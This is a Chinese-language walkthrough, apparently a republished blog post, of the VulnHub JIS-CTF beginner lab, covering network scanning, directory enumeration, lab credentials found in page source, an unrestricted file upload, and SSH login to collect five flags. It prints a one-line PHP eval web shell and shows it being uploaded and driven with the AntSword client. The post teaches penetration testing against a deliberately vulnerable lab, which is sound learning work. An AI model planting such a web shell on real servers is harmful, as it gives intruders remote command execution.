目錄
學(xué)習(xí)前言
準(zhǔn)備工作
一、尋找目標(biāo)主機(jī)(信息收集)
二、敏感文件
三、Getshell上傳木馬
用蟻劍進(jìn)行Getshell
四、尋找Linux密碼進(jìn)行ssh連接
五、連接SSH最后一步
六、總結(jié)
學(xué)習(xí)前言
vulnhub是個(gè)提供各種漏洞平臺(tái)的綜合靶場,可供下載多種虛擬機(jī)進(jìn)行下載,本地VM打開即可,像做游戲一樣去完成滲透測試、提權(quán)、漏洞利用、代碼審計(jì)等等有趣的實(shí)戰(zhàn)。
Vulnhub官網(wǎng)連接:vulnhub官網(wǎng)
今天用到的入門靶場:JIS-CTF: VulnUpload ~ VulnHub??????
準(zhǔn)備工作
環(huán)境:Kali Liunx 任意版本都得,JIS-CTF靶機(jī)也是Linux,中國蟻劍、菜刀、冰蝎,任意一個(gè)都行
用來getshell。
這個(gè)靶場一共有5個(gè)flag,我們一一來找出所有得flag
一、尋找目標(biāo)主機(jī)(信息收集)
因?yàn)槟繕?biāo)主機(jī)和我們在同一個(gè)網(wǎng)段,我們可以掃描一一下我們的網(wǎng)卡
首先使用 ipconfig -a 來查看我們的網(wǎng)卡信息
我們的網(wǎng)卡叫eth0 ,所以我們對(duì)這個(gè)網(wǎng)卡進(jìn)行掃描這個(gè)網(wǎng)卡里有多少臺(tái)設(shè)備
netdiscover -i eth0
可以看到有一個(gè)192.168.159.133、?192.168.159.1、192.168.159.2
這樣我們直接可以確定IP就是192.168.159.133,因?yàn)楹髢蓚€(gè)一個(gè)應(yīng)該是作為網(wǎng)關(guān)地址
如果還是不確定,那么我么可以用nmap來掃描一下這個(gè)網(wǎng)段
nmap -sn 192.168.159.0/24
基本可以確定目標(biāo)主機(jī)就是:192.168.159.133
然后我們可以先用nmap來掃一下它的版本信息,或者開放的端口
nmap -sV 192.168.159.133
?
?然后我們可以發(fā)現(xiàn)開放的端口有22、80
我們馬上就可以聯(lián)想到它對(duì)應(yīng)80端口上有個(gè)網(wǎng)站,我們試著打開網(wǎng)站試試
進(jìn)來后發(fā)現(xiàn)是個(gè)登入界面,貌似沒有什么信息,我們對(duì)它的目錄進(jìn)行掃描一下
dirb http://192.168.159.133
?
?一眼看上去有兩個(gè)敏感的文件,一個(gè)是flag應(yīng)該就是我們想要的答案了,還有一個(gè)是robots.txt
試著訪問一下flag
?第一個(gè)flag找到了
二、敏感文件
上面我們掃描的時(shí)候發(fā)現(xiàn)有:
==> http://192.168.159.133/server-status
==> DIRECTORY: http://192.168.159.133/admin_area/
==> DIRECTORY: http://192.168.159.133/assets/
==> DIRECTORY: http://192.168.159.133/css/
==> DIRECTORY: http://192.168.159.133/flag/
我們試著打開一下看看有啥收獲
訪問這個(gè)的時(shí)候發(fā)現(xiàn)了這個(gè)文件信息暴漏,好像并沒有什么卵用,找了一圈一沒發(fā)現(xiàn)啥
?我么打開?http://192.168.159.133/admin_area/的時(shí)候
?當(dāng)我還是一頭霧水的時(shí)候,按下了F12 看到了想要的 答案了
?還得到
username : admin
password : 3v1l_H@ck3r
三、Getshell上傳木馬
上面我們得到了賬號(hào)和密碼,我們試著登入主站試試
?登入成功?。?!
?這一看就是可以上傳文件得,我們看看試著寫一句話木馬
<?php eval($_POST['cmd'])?>
然后上傳,發(fā)現(xiàn)直接上傳成功了!任意文件上傳
我正要開心得時(shí)候,發(fā)現(xiàn)我們得文件上傳去哪了??我試著抓包發(fā)現(xiàn)
沒有什么有用的消息,然后想起來還有個(gè)目錄我們沒有查看,那就是robot.txt
唉,我們看到了 兩個(gè)敏感的文件
Disallow: /uploads
Disallow: /uploaded_files
?最后我們發(fā)現(xiàn)/uploaded_files里就是存放我們上傳的文件的路徑
用蟻劍進(jìn)行Getshell
打開中國蟻劍、連接我們的shell
?
連接成功
把網(wǎng)站的文件都打開一遍
發(fā)先flag藏在了hint.txt里面?
四、尋找Linux密碼進(jìn)行ssh連接
但是它有又提示
try to find user technawi password to read the flag.txt file, you can find it in a hidden file ;)
意思是嘗試使用?technawi 用戶名 來查看flag.txt文件
那么我們怎么能找到這個(gè) 用戶的密碼呢
我們知道Linux中的password 是存放在 /etc/passwd/ 里面
打開后發(fā)現(xiàn)了我們需要的哪個(gè)用戶名:
?X:代表存放在 /etc/shadow/
但是我們沒有權(quán)限查看它
?只能就此放棄了,然后想想是不是在/etc/下或者其他文件下藏著一段flag呢?
我們用 grep 命令來尋找一下這個(gè)flag到底在哪
grep -sr technawi 'The flag 4th' /etc/
我們看到有個(gè)文件里里面有”The flag 4th“等關(guān)鍵詞
我們?nèi)ゴ蜷_它
?看到了第四個(gè)flag
還獲得了用戶名和密碼:
username : technawi
password : 3vilH@ksor?
五、連接SSH最后一步
直接用kali 連接就行了
shh technawi@192.168.159.133
?連接成功后直接查看剛剛哪個(gè)權(quán)限受限的flag.txt就可以了
cat /var/www/html/flag.txt
最后的flag也出來啦?。?!文章來源:http://www.zghlxwxcb.cn/news/detail-633946.html
六、總結(jié)
Vulnhub JIS-CTF入門的靶機(jī)是非常適合剛?cè)腴T的小伙伴,拿去練習(xí),雖然挑戰(zhàn)性不大,但是還是很有必要去來練習(xí)的,這個(gè)主要是考察一個(gè)很簡單的滲透過程,在真實(shí)環(huán)境當(dāng)中,需要我們更多的是隨機(jī)應(yīng)變,加油網(wǎng)安人,讓我們一起共同進(jìn)步吧!文章來源地址http://www.zghlxwxcb.cn/news/detail-633946.html
到了這里,關(guān)于Vulnhub靶機(jī)滲透之新手入門 JIS-CTF入門靶場-學(xué)習(xí)筆記的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!